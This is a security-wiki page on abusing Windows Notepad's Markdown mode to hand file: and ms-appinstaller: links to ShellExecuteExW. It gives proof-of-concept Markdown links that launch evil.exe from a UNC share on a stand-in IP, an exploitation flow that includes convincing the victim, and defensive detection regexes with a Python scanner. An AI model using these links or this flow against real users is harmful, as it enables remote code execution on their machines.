Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the Telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Modern Windows applications that render Markdown/HTML often turn user-supplied links into clickable elements and hand them to ShellExecuteExW. Without strict scheme allowlisting, any registered protocol handler (e.g., file:, ms-appinstaller:) can be triggered, leading to code execution in the current user context.
ShellExecuteExW surface in Windows Notepad Markdown mode
- Notepad chooses Markdown mode only for .md extensions, via a fixed string comparison in sub_1400ED5D0().
- Supported Markdown links:
  - Standard: [text](target)
  - Autolink: <target> (rendered as [target](target)), so both syntaxes matter for payloads and detections.
- Link clicks are processed in sub_140170F60(), which performs weak filtering and then calls ShellExecuteExW. ShellExecuteExW dispatches to any configured protocol handler, not just HTTP(S).
Payload considerations
- Any \\ sequences in the link are normalized to \ before ShellExecuteExW, which affects UNC/path crafting and detection.
- .md files are not associated with Notepad by default; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable.
- Dangerous example schemes:
  - file:// to launch a local/UNC payload.
  - ms-appinstaller:// to trigger App Installer flows.
  - Other locally registered schemes may also be abusable.
Minimal PoC Markdown
[run](file://\\192.0.2.10\\share\\evil.exe)
<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>
Exploitation flow
- Craft a .md file so Notepad renders it as Markdown.
- Embed a link using a dangerous URI scheme (file:, ms-appinstaller:, or any installed handler).
- Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
- On click, the normalized link is handed to ShellExecuteExW and the corresponding protocol handler executes the referenced content in the user's context.
Detection ideas
- Monitor transfers of .md files over ports/protocols that commonly deliver documents: 20/21 (FTP), 80 (HTTP), 443 (HTTPS), 110 (POP3), 143 (IMAP), 25/587 (SMTP), 139/445 (SMB/CIFS), 2049 (NFS), 111 (portmap).
- Parse Markdown links (standard and autolink) and look for case-insensitive file: or ms-appinstaller:.
- Vendor-guided regexes to catch remote resource access:
  (\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
  (\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
- Patch behavior reportedly allowlists local files and HTTP(S); anything else reaching ShellExecuteExW is suspicious. Extend detections to other installed protocol handlers as needed, since the attack surface varies by system.
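The detection bullets above as a small Python scanner, added here as an example (it is not code from the page or from Notepad): it parses both link syntaxes, applies the double-backslash-to-single normalization the page describes, classifies each target against the reported post-patch allowlist (local files and HTTP(S)), and runs the two vendor regexes. The local-versus-remote file heuristic, the re.I flag on the vendor patterns and the sample document are this example's assumptions.

```python
import re
# Link syntaxes the page names: standard [text](target) and autolink <target>; RFC 3986 scheme.
STANDARD_LINK = re.compile(r"\[[^\]]*\]\(([^)\s]+)\)")
AUTOLINK = re.compile(r"<([A-Za-z][A-Za-z0-9+.-]*:[^>\s]*)>")
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
# Vendor-guided regexes quoted on the page (re.I added here for the case-insensitive match the page advises).
VENDOR_PATTERNS = {
    "file": re.compile(r"(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}", re.I),
    "ms-appinstaller": re.compile(r"(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}", re.I),
}

def classify_target(target: str) -> str:
    """Emulate the reported post-patch policy: local files and HTTP(S) pass, anything else that
    would reach ShellExecuteExW is flagged. The local-vs-remote heuristic is this example's assumption."""
    m = SCHEME.match(target)
    if not m or len(m.group(1)) == 1:            # relative path or drive letter such as C:\
        return "allowed"
    scheme = m.group(1).lower()
    if scheme in ("http", "https"):
        return "allowed"
    if scheme != "file":
        return "handler:" + scheme               # any other registered protocol handler
    body = target[len("file:"):]
    # file:///C:/x, file:/p and file:p are local; a host part (file://h/, file://\\h\s, file:////h) is remote
    if re.match(r"^/*[A-Za-z]:[/\\]", body) or re.match(r"^/?[^/\\]", body):
        return "allowed"
    return "remote-file"

def scan_markdown(markdown: str) -> list:
    """(normalized_target, verdict) for every standard or autolink target that is not allowed."""
    flagged = []
    for raw in STANDARD_LINK.findall(markdown) + AUTOLINK.findall(markdown):
        target = raw.replace("\\\\", "\\")       # '\\' -> '\' as the page says Notepad does
        verdict = classify_target(target)
        if verdict != "allowed":
            flagged.append((target, verdict))
    return flagged

def vendor_hits(markdown: str) -> list:
    """Names of the vendor regexes that fire on the raw (un-normalized) Markdown text."""
    return [name for name, rx in VENDOR_PATTERNS.items() if rx.search(markdown)]

# Constructed sample (not from the page): benign links beside the two dangerous schemes.
SAMPLE_MD = "\n".join([
    r"Docs: [site](https://example.com/docs) and <https://example.com/faq>",
    r"Local: [readme](file:///C:/Users/Public/readme.txt) and [log](./CHANGELOG.md)",
    r"UNC: [run](FILE://\\192.0.2.10\\share\\evil.exe)",
    r"Auto: <ms-appinstaller://192.0.2.10/share/pkg.appinstaller>",
])
```

On the sample, scan_markdown flags the FILE: UNC link and the ms-appinstaller: autolink, while vendor_hits fires only for ms-appinstaller: because the vendor file: regex requires four slash or double-backslash groups and the two-backslash form has three. Pairing the scheme check with the vendor regexes therefore covers more link shapes than either alone.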